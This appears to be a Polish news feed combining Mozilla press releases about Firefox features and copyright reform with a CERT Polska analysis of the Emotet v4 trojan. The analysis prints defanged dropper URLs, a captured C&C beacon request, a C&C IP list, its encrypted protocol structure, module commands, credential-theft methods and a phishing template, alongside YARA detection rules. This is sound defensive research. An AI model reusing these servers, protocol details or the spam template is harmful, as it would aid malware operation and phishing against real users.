Firefox dla iOS przedstawia nowe i ulepszone funkcje: Karty, Tryb nocny oraz Czytnik QR kodów

W zespole Firefoksa zawsze staramy się zapewniać użytkownikom najlepsze doświadczenia podczas korzystania z sieci. Dzisiaj wprowadzamy ulepszenia stanowiące bazę dla tego, co czeka nas w ramach Project Quantum tej jesieni. Nowe funkcje mają uatrakcyjnić przeglądarkę mobilną i usprawnić korzystanie z Firefoksa dla iOS.

Nowe funkcje Firefox dla iOS:

Nowe karty

Ulepszyliśmy przeglądanie kart, dzięki czemu użytkownicy zobaczą ostatnio odwiedzane strony oraz te najczęściej odwiedzane.

Tryb nocny

Często, gdy znajdujemy się w ciemnym pomieszczeniu chcemy włączyć telefon komórkowy, żeby sprawdzić godzinę. Dodaliśmy więc Tryb nocny, który przyciemnia ekran telefonu i nie nadwyręża oczu. Od teraz czytanie w ciemności będzie łatwiejsze, a ryzyko, że ktoś przyłapie nas na sprawdzaniu poczty znacznie mniejsze.

Czytnik kodów QR

Chcesz ograniczyć liczbę aplikacji zainstalowanych na telefonie? Wyeliminowaliśmy konieczność pobierania osobnej aplikacji do kodów QR, wprowadzając wbudowany czytnik umożliwiający szybki dostęp do kodów QR.

Rekomendacje funkcji

Wszyscy uwielbiamy skróty, a nasze Rekomendacje funkcji zaoszczędzą Twój czas oferując podpowiedzi. Na początek ta funkcja będzie dostępna tylko w Stanach Zjednoczonych i w Niemczech.

Aby sprawdzić najnowsze funkcje i skorzystać z najnowszej wersji przeglądarki Firefox dla iOS należy pobrać aktualizację.

Mamy nadzieję, że się Wam spodoba!

kornelia.gruszka, 20 lipca 2017, 14:03

20 czerwca 2017

Centrum prasowe Mozilli

Firefox Focus teraz na Androida, blokuje reklamy i chroni Twoją prywatność

W zeszłym roku wprowadziliśmy Firefox Focus, nową przeglądarkę dla iPhone’a i iPada, zaprojektowaną tak, aby była szybka, prosta i zawsze chroniła Twoją prywatność. Od listopada wiele się wydarzyło, a my coraz częściej widzimy, że użytkownicy aktywnie chronią swoją prywatność i zużycie danych.

Focus to przeglądarka dla tych, którzy chcą zachować przeglądanie Internetu dla siebie. Reakcje użytkowników pozytywnie nas zaskoczyły – to najlepiej oceniania przeglądarka dla iPhone’a i iPada, z oceną 4.6 w App Storze.

Dziś mamy przyjemność ogłosić, że Firefox Focus jest też dostępny na Androida.

Podobnie jak w wersji na iPhone’a i iPada, aplikacja na Androida jest wolna od kart i innych elementów zakłócających przeglądanie, a usunięcie sesji ogranicza się do jednego kliknięcia. Firefox Focus pozwala Ci na surfowanie po sieci bez śledzących Cię reklam, które znane są ze spowalniania działania przeglądarki. Dlaczego blokujemy te trakery? Ponieważ śledzą Twoje zachowania bez Twojej wiedzy oraz sprawiają, że internet działa wolniej na Twoim telefonie.

 

 

 

 

 

 

 

 

 

 

 

 

Do Firefox Focus na Androida dodaliśmy następujące funkcje:

Dzięki swoim funkcjom takim jak wsparcie dla spersonalizowanych kart i wyłączenie blokowania reklam, Focus będzie też doskonale współpracował z aplikacjami takimi jak Facebook, kiedy będziecie chcieli przeczytać artykuł bez śledzenia. Będziemy kontynuować nasze prace nad przeglądarką, aby stale ją ulepszać.

Firefox Focus możesz pobrać tutaj.

kornelia.gruszka, 20 czerwca 2017, 11:15

14 czerwca 2017

Centrum prasowe Mozilli

Najlepszy Firefox

Nasza najnowsza wersja Firefoksa z E10S to idealna harmonia między pamięcią a szybkością

Nick Nguyen, 13 czerwca 2017

Nasz zespół Firefoksa często słyszy od użytkowników, że polegają na sieci podczas skomplikowanych zadań, jak planowanie podróży czy porównywanie cen. A zadania te wymagają otwarcia kilku kart. Na stronach pootwieranych w kartach często dużo się dzieje – animacje, wideo, duże zdjęcia. Rozbudowane strony są teraz coraz bardziej popularne – średnio zajmują 2,5 MB – tyle samo co oryginalna wersja gry Doom, według Wired. Do teraz rozbudowane strony otwarte w kartach w Firefoksie mogły spowolnić działanie innych kart, co oznaczało gorszy komfort pracy.

Aby Firefox działał jeszcze szybciej na rozbudowanych stronach, zmieniliśmy go tak, żeby funkcjonował w oparciu o wieloprocesowy system operacyjny. Prościej? Stary Firefox działał na podstawie pojedynczego procesu we wszystkich otwartych kartach. Współczesne przeglądarki rozkładają taki nakład na kilka procesów. Nasz proces nazwaliśmy „Electrolysis (E10S)”, na cześć procesu chemicznego, który rozkłada wodę na mniejsze elementy. E10S to największa do tej pory zmiana w kodzie Firefoksa, a dziś udostępniamy kolejny jej element.

Szybszy Firefox z 4 procesami

W dzisiejszym wydaniu Firefox używa 4 procesów do obsługi stron we wszystkich otwartych kartach. To oznacza, że rozbudowana strona otwarta w jednej z kart nie ma wpływu na działanie innych. Rozdzielając te procesy usprawniamy działanie Twojego komputera, a Firefox pozwala Ci swobodnie przeglądać sieć.

Korzystałem z tej opcji w nieoficjalnej wersji Firefoksa (Nightly). Poprawa wydajności jest bardzo widoczna. Poza szybszym działaniem i rzadszym wyłączaniem, E10S sprawia, że strony, nawet takie jak newsfeed na Facebooku, wydają się bardziej przejrzyste w odbiorze. Nie wyobrażam sobie już z korzystania z innego Firefoksa, jak tylko z tego z E10S.

Firefox 54 z E10S sprawia, że strony działają lepiej na wszystkich komputerach, szczególnie tych z mniejszą pamięcią. Celem Firefoksa jest osiągnięcie idealnej równowagi między szybkością działania a zużyciem pamięci. Aby dowiedzieć się więcej o wieloprocesowej architekturze Firefoksa i czy różni się od Chrome’a przeczytaj wpis Rayana Pollocka.

Wieloprocesowość bez obciążania pamięci – Firefox wygrywa porównanie zużycia pamięci

W naszych testach porównaliśmy zużycie pamięci dla różnych przeglądarek i zobaczyliśmy, że Firefox zużywa znacznie mniej RAM-u niż inne przeglądarki na Windows 10, macOS i Linuksie. (RAM oznacza pamięć o dostępie swobodnym, taką, w której zapisane są aplikacje, z których korzystasz). To oznacza, że z Firefoksem możesz do woli przeglądać strony i mieć wystarczająco dużo pamięci, aby uruchomić inne aplikacje, których chcesz używać.

Najlepszy Firefox

To najlepsze jak do tej pory wydanie Firefoksa, z usprawnieniami, które każdy zauważy. W tym wydaniu wprowadzamy też kilka innych ulepszeń, o których możecie przeczytać tutaj. Jeśli jesteś deweloperem webowym lub zbudowałeś rozszerzenie do przeglądarki, sprawdź bloga Hacks i przeczytaj o uaktualnieniach.

Robimy postępy w pracach nad Project Quantum oraz przeglądarką dostosowaną do współczesnych komputerów. Naszym celem jest, aby Firefox stał się najszybszą przeglądarką w wersji desktopowej i mobilnej. Pod koniec 2017 roku zobaczycie jeszcze kilka zmian od zespołu Firefoksa. Jeśli przestałeś go używać, daj mu drugą szansę – będziesz pod wrażeniem. Czekamy na Wasze opinie.

kornelia.gruszka, 14 czerwca 2017, 13:22

24 maja 2017

CERT Polska

Analiza złośliwego oprogramowania Emotet v4

Wstęp

Emotet jest modularnym koniem trojańskim, który po raz pierwszy został zaobserwowany w czerwcu 2014 roku przez Trend Micro. Ten rodzaj złośliwego oprogramowania jest ściśle powiązany z innymi rodzajami, takimi jak Geodo, Bugat czy Dridex, które uznawane są za warianty należące do jednej rodziny.

Zadebiutował jako zaawansowany banker – u swych początków wykorzystywany był do wykradania pieniędzy z kont zainfekowanych ofiar. Jego początkowa wersja była wymierzona w klientów niemieckich i austriackich banków. Przejmowanie kont odbywało się z użyciem techniki Man-in-the-Browser, polegającej na przejęciu kontroli nad przeglądarką i przechwytywaniu komunikacji sieciowej przez podsłuchiwanie wywołań odpowiednich funkcji systemowych.

W kolejnej wersji (v2) arsenał Emoteta został uzupełniony o automatyczne wyprowadzanie pieniędzy z kont przy pomocy systemów ATS (Automatic Transfer System) (dokładniejszy opis tej techniki można znaleźć na 20 stronie raportu CERT Polska z 2013 r.). Jest to sposób powszechnie wykorzystywany również w innych bankerach, m.in. w ISFB (Gozi) i Tinbie.

Na początku kwietnia 2017r. zaobserwowaliśmy szeroką kampanię spamową, w której były dystrybuowane fałszywe maile pochodzące rzekomo od firmy kurierskiej DHL. Maile zawierały odnośnik prowadzący do nieznanego wcześniej, nowego wariantu złośliwego oprogramowania znanego pod nazwą Emotet.

W przypadku tej kampanii, zmiany w kodzie oprogramowania, a także w sposobie komunikacji z serwerami Command&Control wskazywały, iż mamy do czynienia z Emotetem w wersji 4. Z tego względu postanowiliśmy szczegółowo przeanalizować to zagrożenie.

Dropper

Skrypt do którego prowadziły odnośniki zawarte w mailach nie był mocno zobfuskowany. Łańcuchy znaków zostały jedynie odwrócone, stąd można było bez większego trudu odczytać adresy URL, prowadzące do pliku zawierającego omawiany malware.

Adresy URL prowadzące do Emoteta:

hxxp://etherealmedia.co.uk/download6051/
hxxp://intecsoftware.com/download1577/
hxxp://danirvinphotography.com/download0303/
hxxp://brandcastersmedia.com/download6493/
hxxp://aktech.com.pl/download9674/

Moduł główny

Emotet jest złośliwym oprogramowaniem o strukturze modułowej. Podstawowym zadaniem pobieranego przez dropper pliku wykonywalnego jest rejestracja bota i pobranie modułów pełniących konkretne zadania. Złośliwe oprogramowanie dostarczane jest w postaci spakowanej przy pomocy generycznego packera, który w zamierzeniu ma zmylić silniki antywirusowe i utrudnić analizę. Po rozpakowaniu, sterowanie przekazywane jest do głównego kodu.

Na samym początku ładowane są biblioteki i rozwiązywane są adresy funkcji WinAPI, wykorzystywane przez malware m.in. do szyfrowania i komunikacji z serwerem Command&Control. Nazwy potrzebnych funkcji i bibliotek przechowywane są w postaci tablic wartości funkcji skrótu z nazwy danego elementu. Emotet wykorzystuje w tym celu prostą funkcję haszującą sdbm. Aby dodatkowo zróżnicować tablice, zawarte w nich wartości XORowane są dodatkowo ze stałą wartością określoną w pliku.

Charakterystyczne łańcuchy znaków również nie występują jawnie – są dekodowane na czas użycia przy pomocy 4-bajtowego klucza XOR skojarzonego z danym łańcuchem.

Główny plik wykonywalny zawiera również listę adresów IP i portów, kierujących do serwerów C&C. Podobnie jak w poprzednich wersjach – komunikacja z serwerem kontrolera przebiega z użyciem protokołu HTTP.

Szyfrowanie komunikacji

Największe zmiany względem poprzedniej wersji Emoteta można zaobserwować w komunikacji. Wcześniej do szyfrowania wykorzystywany był algorytm RC4. W wersji czwartej wykorzystywany jest 128-bitowy AES.

Przykładowe żądanie wygląda następująco:

GET / HTTP/1.1
Cookie: DD29=e8fd7YpIy2Ui+U7bz1/cQD9bH4KHshzaN2SpKoPEnC1D85K4Zrwdb6dBoHoDC5GgvcgecLN20kpk1lQxus6AJEiutWK4hBSWFbQUmtyr3LxI+/3MFdKn1lo7nWyEw+sCzKL6y34njzJwoDwd3I5BJD0NqUL+iEnbB1EWXQhxcXihFeFS+TlRsuMxOl3Xmyo2p0FuHX+hyGoO19dzLpEMK1LhXGkCkha+kPGFqfxECUoQndFLiMRgXAj4Omw/Ywc6Ba+9d5fyZNLEKbtkxsfO3KmQSLoE4TkITRri1kSMCqnNlb7PTroCQmoJvRHBiEGla6VzgmCQ5tsspBIuaWc2ct9hX9c4SLZbTnW6mPjLIh4VeDJ7gNpwhedyLHcnr3GWjILLwFPk7RmgHglXXI2qEOXcwbRhtaNuI8RrkMQj37Rov147wEGBtt+GlQR9/9oFXoBXH9f6m5K4ULP3CEnDGGJVEtfkgt7yZ082wAIfVzow1szvMF4bF7MFaCPbHA9hygyf9Uc8GwDjM4CndFxUwROWmEgQKjIk24PIj5Y+oz4jF
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 206.214.220.79:8080
Connection: Keep-Alive
Cache-Control: no-cache

Treść żądania zawarta jest w nagłówku Cookie. Nazwa „ciasteczka” generowana jest losowo i stanowi 16-bitową wartość zakodowaną szesnastkowo. Wartość ciasteczka zawiera żądanie zakodowane w Base64.

Wartość po odkodowaniu ma następującą strukturę:

Offset Nazwa pola
0..95 Zaszyfrowany asymetrycznie 128-bitowy klucz AES wykorzystany do zaszyfrowania żądania
96..115 Wartość SHA1 z treści żądania w postaci jawnej
116..x Żądanie zaszyfrowane kluczem AES-128 w trybie CBC

Przed wysłaniem żądania tworzone są dwa klucze. Najpierw ładowany jest 768-bitowy klucz publiczny RSA, zawarty w pliku wykonywalnym. Następnie generowany jest losowy klucz AES-128-CBC, który posłuży do szyfrowania komunikacji z C&C. Wygenerowany klucz AES szyfrowany jest kluczem RSA-768 i dołączany jest do żądania z użyciem PKCS#1v2.0 (OAEP).

Kryptografia zrealizowana jest przy pomocy zestawu funkcji Microsoft CryptoAPI.

Generowanie i importowanie kluczy:

Szyfrowanie żądania:

Komunikacja z C&C

Po przechwyceniu i odszyfrowaniu komunikatu z żądaniem – żądanie prezentowało się następująco:

W komunikacji wykorzystywany jest protokół bazujący na Google Protocol Buffers. Protocol Buffers stanowi rozwiązanie, które pozwala na proste budowanie protokołów, przy użyciu struktur definiowanych w języku protobuf. Na podstawie tak określonych struktur, Protocol Buffers generuje moduły, dostarczające parsery i serializery dla poszczególnych elementów protokołu, które mogą być bezpośrednio wykorzystane w aplikacji. Protocol Buffers pozwala na generowanie modułów dla wielu języków programowania. Wśród wspieranych języków jest m.in. Python, Java, PHP czy C++. Zastosowanie tego typu rozwiązań nie jest nowością w przypadku złośliwego oprogramowania i było wykorzystywane wcześniej, np. w Gootkicie.

W przypadku Emoteta, autor pokusił się o małą modyfikację. Jeden z elementów wykorzystuje niestandardowe kodowanie, przez co nie jest poprawnie odczytywany przez standardowe parsery (przykładowo protoc –decode_raw zwraca błąd).

Mimo to udało nam się odtworzyć strukturę protokołu:

W żądaniu rejestracji wysyłany jest numer komendy (16) i podstawowe dane o systemie operacyjnym, na którym bot zostaje uruchomiony. Poszczególne pola struktury RegistrationRequestBody zawierają następujące informacje:

Pole botId

Pole botId zawiera identyfikator bota unikalny dla danej maszyny. Jego wartość ma następującą strukturę:

[host_name]_[locale]_[host_id]
np. CERTCERT_PL_32122958

Pole osVersion

32-bitowe pole określające wersję systemu operacyjnego Windows. Poszczególne bity zawierają informację o następujących elementach struktury OSVERSIONINFOEX

Bity Opis pola
0..3 dwMajorVersion
4..7 dwMinorVersion
8..11 wServicePackMajor
12..15 wServicePackMinor
16..19 wProductType
20..23 SYSTEM_INFO.wProcessorArchitecture

Pole procList

Zawiera listę nazw uruchomionych procesów, oddzielonych przecinkiem.

Pole mailClient

Informacje o wykorzystywanym kliencie poczty (wartość pozyskiwana z klucza rejestru HKLM\Software\Clients\Mail). Jeśli jest to Microsoft Outlook i jego plik DLL MAPI (Messaging Application Program Interface) jest 64-bitowy, do nazwy dodawany jest przyrostek „x64” po spacji.

Odpowiedź

W odpowiedzi C&C dostarcza listę modułów złośliwego oprogramowania. Bez względu na to czy zostało wysłane poprawne żądanie, czy nie – odpowiedź zawsze zawiera status 404 Not Found. Mimo to, przy poprawnym skomunikowaniu się z serwerem, w treści otrzymujemy zaszyfrowaną odpowiedź.

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Length: 728740
Connection: keep-alive

alc:*qLud<d^G̾>...

Struktura zaszyfrowanej odpowiedzi jest podobna do struktury żądania. Do szyfrowania wykorzystywany jest klucz AES wygenerowany przez próbkę i przekazany w żądaniu. Po odszyfrowaniu, otrzymujemy komunikat o strukturze odpowiadającej następującemu plikowi protobuf:

W tym przypadku wykorzystywane jest niestandardowe kodowanie, o którym wspomnieliśmy na samym początku. Otóż pole repeated Module modules = 1 [packed=true]; jest niedozwolone w kontekście języka struktur protobuf, ponieważ atrybut packed może być zastosowany wyłącznie do typów liczbowych, a nie do obiektów typu Message.

Przenosząc to na opis odpowiadający kodowaniu wykorzystywanemu w Protocol Buffers, odpowiedź ma następującą strukturę:

Typ Nazwa Komentarz
ModuleResponse
TAG tag 0x0a
VARINT rozmiar wszystkich elementów ‚modules’
Module (dla każdego modułu)
VARINT długość elementu
TAG tag pola ‚type’ 0x08
VARINT ‚type’
TAG tag pola ‚blob’ 0x12
VARINT rozmiar pola ‚blob’
RAW zawartość ‚blob’

Warto zaobserwować, iż elementy Module są powtarzane bez poprzedzającego tagu, co jest charakterystyczne dla kodowania packed.

Pole type

Pole type definiuje typ bufora i sposób w jaki należy potraktować jego zawartość. Może przyjmować następujące wartości:

Numer komendy Opis
1 Zapisz do %TEMP% i wykonaj z parametrem -U
2 Podobnie jak ‚1’, ale bez dodatkowego parametru
3 Pobierz plik wykonywalny z URLa podanego w ‚blob’
4 Użyj wewnętrznego loadera – załaduj i wykonaj plik wykonywalny zawarty w ‚blob’
5 Deinstalacja – usuń skojarzony skrót ‚.lnk’ malware’u z folderu Autostart
inne Nie rób nic

Moduły

W poprzednich wersjach wśród modułów zawarte były elementy odpowiadające za takie funkcjonalności jak:

W wersji 4 dystrybuowanej m.in. w ostatniej kampanii podszywającej się pod DHL, nie zaobserwowaliśmy modułu dość charakterystycznego dla Emoteta, czyli modułu bankowego. Zachowanie pozostałych modułów w większości pozostało jednak bez zmian. Poniżej zawarty jest opis modułów zaobserwowanych w omawianej kampanii:

Moduły wykradające dane dostępowe

Wśród zaobserwowanych modułów znajdowały się dwa, służące do wykradania haseł i danych dostępowych z przeglądarki i klienta pocztowego.
Oba moduły do swoich celów wykorzystywały oprogramowanie firmy NirSoft:

Obie aplikacje zawarte były bezpośrednio w pliku wykonywalnym modułów, zakodowane prostą operacją XOR z 32-bitowym kluczem. Po odkodowaniu i zapisaniu do %TEMP%, wykonywane były z parametrem /scomma [nazwa pliku tymczasowego], co prowadziło do zapisania wszystkich haseł do pliku w %TEMP% (nazwa generowana przez GetTempFileNameW). Następnie dane wysyłane były do serwera C&C.

Moduł spamowy

Trzeci zaobserwowany przez nas moduł, służący do rozsyłania spamu zawierającego link do Emoteta jest szczególnie interesujący. Na początku moduł prosi serwer C&C o szablon wiadomości, listę odbiorców i listę kont, z których ma być przeprowadzone rozsyłanie.
Struktura żądania wygląda następująco:

Pola flags i additionalData służą do określania, jakie dane zostały już pozyskane od kontrolera i jakich oczekujemy w odpowiedzi.
Odpowiedź serwera ma następującą strukturę:

Do poszczególnych botów wysyłane są nie tylko dane dotyczące rozsyłanych wiadomości, ale również lista danych dostępowych do kont, z których ma być przeprowadzone rozsyłanie. Konta prawdopodobnie są pozyskiwane przez moduł wykorzystujący Mail PassView, opisany wcześniej.

Przykładowy szablon wiadomości:

Hello <span style="text-transform: uppercase;">&lt;&gt;</span>

Thank you for your order. The details can be found below.

Invoice attached: <a href="http://aceeight.com/Cust-000564-17424/">http://aceeight.com/Cust-000564-17424/&lt;&gt;</a>

This e-mail was sent by <span style="text-transform: uppercase;">&lt;&gt;
&lt;&gt;</span>

Podsumowanie

Podstawową funkcją Emoteta obserwowaną w niedawnych kampaniach jest wykradanie danych dostępowych. W przypadku infekcji zalecamy przede wszystkim zmianę haseł do wykorzystywanych skrzynek mailowych z poziomu lokalnego klienta poczty, a także haseł do serwisów, które były zapisane w przeglądarce.
Emotet jest wciąż aktywny w sieci i istnieje szansa, że ten rodzaj zagrożenia pojawi się w przyszłych kampaniach.

Informacje dodatkowe

Analiza oparta jest na próbce c53956c95100c5c0ba342977f8fc44fcad35aabc24ec44cb12bb83eee1ed34fa

Lista skrótów MD5 modułów (widoczne 13 kwietnia):

0497c120248c6f00f1ac37513bd572e5
5b2d58b4104309ee9c93b455d39c7314
722268bad0d3a2e90aa148d52c60943e

Lista adresów C&C

hxxp://87.106.105.76:443
hxxp://173.255.229.121:443
hxxp://178.79.177.141:443
hxxp://79.170.95.202:7080
hxxp://206.214.220.79:8080
hxxp://88.198.50.221:8080
hxxp://5.39.84.48:8080
hxxp://188.68.58.8:7080
hxxp://162.214.11.56:7080
hxxp://5.196.73.150:8080
hxxp://203.121.145.40:7080
hxxp://46.165.212.76:7080

Klucz publiczny C&C:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAJ16QBv5Csq0eruFy4BvTcXmmIyeqUb3
vCCc8K/zOYOpL/Ww6FCdUpvPfs+RR/sLBalwtKmT14iRUaNmJdygnAKUIRWR1HNt
0rQRir0pD4QlkXlnZ9lZazTfyMV8BLCatwIDAQAB
-----END PUBLIC KEY-----

Reguły Yara:

rule emotet4_basic: trojan
{
    meta:
        author = "psrok1/mak"
        module = "emotet"
    strings:
        $emotet4_rsa_public = { 8d ?? ?? 5? 8d ?? ?? 5? 6a 00 68 00 80 00 00 ff 35 [4] ff 35 [4] 6a 13 68 01 00 01 00 ff 15 [4] 85 }
        $emotet4_cnc_list = { 39 ?? ?5 [4] 0f 44 ?? (FF | A3)}
    condition:
        all of them
}

rule emotet4: trojan
{
    meta:
        author = "psrok1"
        module = "emotet"
    strings:
        $emotet4_x65599 = { 0f b6 ?? 8d ?? ?? 69 ?? 3f 00 01 00 4? 0? ?? 3? ?? 72 }
    condition:
        any of them and emotet4_basic
}

rule emotet4_spam : spambot
{
    meta:
        author="mak"
        module="emotet"
    strings:
        $login="LOGIN" fullword
        $startls="STARTTLS" fullword
        $mailfrom="MAIL FROM:"
    condition:
        all of them and emotet4_basic
}

Artykuł Analiza złośliwego oprogramowania Emotet v4 pochodzi z serwisu CERT Polska.

Paweł Srokosz, 24 maja 2017, 11:30

9 maja 2017

Centrum prasowe Mozilli

Napraw unijne prawo autorskie: Mozilla i Moniker stworzyli cyfrowe narzędzie, które zmusza polityków do unowocześnienia prawa autorskiego w Unii Europejskiej

Przestarzałe prawo autorskie zagraża Internetowi w Unii Europejskiej.

Funkcjonujące obecnie prawo autorskie zostało stworzone przed epoką internetu i przeszkadza w kreowaniu innowacji, utrudnia przedsiębiorcom tworzenie na bazie istniejących danych lub kodów. Może ograniczać kreatywność, a tworzenie, udostępanie i edytowanie memów oraz innych treści będzie nielegalne. Może też zmniejszyć ilość materiałów, na których opierają się nauczyciele i organizacje pozarządowe takie jak Wikipedia, wykorzystując je do dzielenia się wiedzą.

Dlatego Mozilla zrzuca miliony ulotek na europejskie miasta.

W pewnym sensie.

Mozilla nie posiada floty zeppelinów. I lubimy oszczędzać papier.

Dlatego zbudowaliśmy Paperstorm.it. To cyfrowe narzędzie, które zachęca polityków w Unii Europejskiej do dostosowania prawa autorskiego do potrzeb ery internetowej.

Paperstorm pozwala na rozrzucenie ulotek o reformie prawa autorskiego na mapach charakterystycznych miejsc w Europie, na przykład na Pałac Kultury i Nauki w Warszawie. Kiedy zrzucisz ich odpowiednio dużo, twórcy unijnego prawa, tacy jak przewodniczący Komisji Prawnej Parlamentu Europejskiego Pavel Svoboda, zostaną poinformowani w mediach społecznościowych o potrzebie wsparcia reformy.

Samodzielnie możesz rozrzucić garść ulotek. Ale razem możemy zrzucić ich miliony – i wysłać jasną, mocną wiadomość do decydentów w Unii Europejskiej.

Paperstorm jest wynikiem współpracy między Mozillą a Moniker, nagrodzonym Webby Award interaktywnym studiem projektowym z Amsterdamu. Paperstorm to kolejny obok Codemoji i Post Crimes projekt Mozilli na rzecz działania w obronie mediów.

Dlaczego projekt rusza właśnie teraz? Reforma prawa autorskiego znajduje się w kluczowym momencie. Obecnie trwają prace nad poprawkami do nowego projektu regulacji, będą gotowe jeszcze w tym roku. Poprawki mogą zmienić prawo w taki sposób, by było bardziej przyjazne dla internetu lub wręcz przeciwnie – aby stało się bardziej restrykcyjne i zakorzenione w XX wieku.

Dobra wiadomość jest taka, że twórcy prawa nas słuchają. W zeszłym roku Mozilla i nasi sprzymierzeńcy zebrali setki tysięcy podpisów pod propozycją reformy prawa autorskiego, która sprzyjałaby innowacji i kreatywności w Europie. Niektórzy członkowie Parlamentu Europejskiego z zaangażowaniem pracowali nad ulepszeniem propozycji Komisji i wzięli pod uwagę niektóre zaproponowane przez nas zmiany, takie jak usunięcie obowiązkowych filtrów przy przesyłaniu treści, czy sprzeciwienie się rozszerzaniu praw autorskich wobec linków i wycinków.

Ale jeszcze wiele osób trzeba przekonać, by nie psuły internetu i zaczęły wspierać nowoczesną reformę prawa autorskiego, która wzmacnia twórców, innowatorów i wszystkich użytkowników internetu.

“Propozycja Komisji Europejskiej dotycząca modernizacji prawa autorskiego dla XXI wieku rozczarowuje”, mówi Raegan MacDonald, Senior Policy Manager Mozilli w Unii Europejskiej. “Zamiast promować innowacje i kreatywność w sieci, raczej by je stłumiła”.

“Szczególnie martwimy się przepisami dotyczącymi obowiązkowych filtrów przy wrzucaniu treści do sieci, które w imię ochrony praw autorskich wymusiłyby monitorowanie wszystkich przesyłanych treści na serwisach takich jak Soundcloud, eBay, a nawet Wikipedia” – dodaje McDonald. „Takie zobowiązanie miałoby katastrofalny wpływ na ekosystem internetowy oraz doprowadziłoby do tłumienia wolności słowa i wyeliminowania mniejszych graczy”.

“Paperstorm to jednocześnie narzędzie do mówienia o konkretnych problemach i projekt artystyczny” – mówi Luna Maurer, współzałożycielka Monikier. „Jest to sposób na zbadanie, jak świat cyfrowy krzyżuje się z tym rzeczywistym, a jednocześnie wspiera wolność słowa w sieci”.

Jeśli wspierasz rozsądne prawo autorskie w Unii Europejskiej – i lepszy Internet – dołącz do #paperstorm dzisiaj.

kornelia.gruszka, 9 maja 2017, 07:24

19 kwietnia 2017

Centrum prasowe Mozilli

Firefox teraz szybszy i bardziej stabilny dzięki Project Quantum

Nick Nguyen, April 19, 2017

Dzisiejsze wydanie Firefoksa to solidna porcja usprawnień w ramach Project Quantum oraz wiele widocznych ulepszeń, jak i tych mniej oczywistych.

Quantum Compositor przyśpiesza działanie Firefoksa i zapobiega problemom z grafiką w systemie Windows

Budujemy silnik nowej generacji dla przeglądarek, który w pełni wykorzysta możliwości nowoczesnego sprzętu. Dziś udostępniamy pierwszy, ważny element tego projektu, który nazwaliśmy “Quantum Compositor”.

Kilka szczegółów technicznych: wyodrębniliśmy rdzeń naszej przegladarki (kompozytor grafiki), aby działał niezależnie od głównego procesu Firefoksa. Kompozytor odpowiada za to, co widzisz na ekranie: spłaszcza wszystkie warstwy grafiki, z których korzysta przeglądarka – podobnie jak Photoshop łączy warstwy w jeden obraz. Quantum Compositor korzysta z karty graficznej a nie z procesora, i dzięki temu jest szybszy. Ponieważ pracuje on w osobnym procesie, jeśli coś pójdzie nie tak, nie zatrzyma to działania całego Firefoksa, ani nawet aktualnie otwartej karty.

W testach Quantum Compositor zmniejszył zawieszanie się przeglądarki o około 10%. Więcej możesz dowiedzieć się tutaj. Quantum Compositor będzie dostępny dla 70% użytkowników Firefoksa – dla tych korzystających z Windowsa 10, 8, 7 i komputerach z kartami graficznymi Intel, NVidia lub AMD.  

A jeśli chodzi o sprzęt firmy Apple – nakładanie na siebie kolejnych warstw jest już na tyle stabilne w systemie MacOS, że osobny kompozytor nie jest potrzebny.

Oszczędź miejsce na ekranie – i swoje oczy – dzięki nowym motywom i zakładkom

Zadaniem przeglądarki jest dostarczenie Ci tego, czego potrzebujesz, bez zbędnych

Dzisiejsze wydanie Firefoksa w wersji desktopowej zawiera dwa nowe motywy: Compact Light i Compact Dark. Compact Light zmniejsza rozmiar interfejsu przeglądarki zachowując jasne kolory. Compact Dark zmienia kolory na ciemne, żeby nie razić Twoich oczu, kiedy przeglądasz strony wieczorem. Aby włączyć któryś z motywów przejdź do Menu i wybierz Dodatki (lub kliknij tutaj). Potem wybierz Panel Wyglądu i motyw, który chciałbyś aktywować.  

Firefox na Androida ma także nowe ustawienia dla kart. Kiedy będziesz chciał otworzyć inną kartę, pokażą się one w dwóch kolumnach zamiast jednej i dzięki temu będzie można łatwiej przechodzić między kilkoma otwartymi kartami. Aby uruchomić tę opcję przejdź do Ustawienia > Ogólne.

Z łatwością kontroluj do czego witryna ma dostęp i kiedy może wysyłać Ci powiadomienia

Wiele stron, aby prawidłowo działać musi mieć Twoje pozwolenie na dostęp do sprzętu lub wysyłanie powiadomień. Na przykład, aplikacje do konferencji wideo potrzebują dostępu do kamery i mikrofonu, a mapy do lokalizacji – żebyś sam nie musiał wpisywać adresu. Podobnie strony z wiadomościami i media społecznościowe proszą o dostęp do wysyłania powiadomień o najświeższych i najważniejszych wydarzeniach.

Dzisiejsze wydanie Firefoksa w wersji desktopowej zawiera też zmieniony interfejs ekranu zarządzania uprawnieniami witryn. Teraz, kiedy odwiedzasz stronę, która wymaga dostępu do wrażliwych danych lub chce wysyłać Ci powiadomienia, zobaczysz na ekranie okienko, które szczegółowo poinformuje Cię o wszystkim, do czego dostęp chce mieć dana strona. Jeśli później będziesz chciał zmienić te ustawienia, wystarczy że klikniesz na ikonkę „i” w Awesome Bar.

Więcej o zmianach w Firefoksie dowiesz się tutaj.

Więcej nowości:

Aby dowiedzieć się o wszystkich zmianach przeczytaj ten wpis, poniżej wybraliśmy kilka ważniejszych:

Jeśli jesteś deweloperem i chciałbyś dowiedzieć się więcej o najnowszym wydaniu odwiedź Hacks blog

Mamy nadzieję, że podobają Wam się wprowadzone zmiany. 

 

 

 

 

kornelia.gruszka, 19 kwietnia 2017, 17:23

29 marca 2017

Centrum prasowe Mozilli

Ogłaszamy zwycięzców Equal Rating Innovation Challenge

Sześć miesięcy temu wystartował projekt Equal Rating Innovation Challenge, który miał na celu podkreślenie znaczenia koncepcji „Equal Rating”, nad którą pracuje Mozilla. Dodatkowo chcieliśmy znaleźć nowe możliwości zapewnienia dostępu do Internetu jeszcze szerszej grupie osób, zachowując przy tym neutralność sieci.

Otwarty i angażujący projekt

Projekt miał na celu dotarcie do lokalnych ekspertów, innowatorów, przedsiębiorców i badaczy z całego świata, aby pomóc Mozilli dostarczyć Internet kolejnemu miliardowi użytkowników. Obserwowanie jak w projekt angażują się społeczności i przedsiębiorcy, było bardzo ciekawym doświadczeniem.

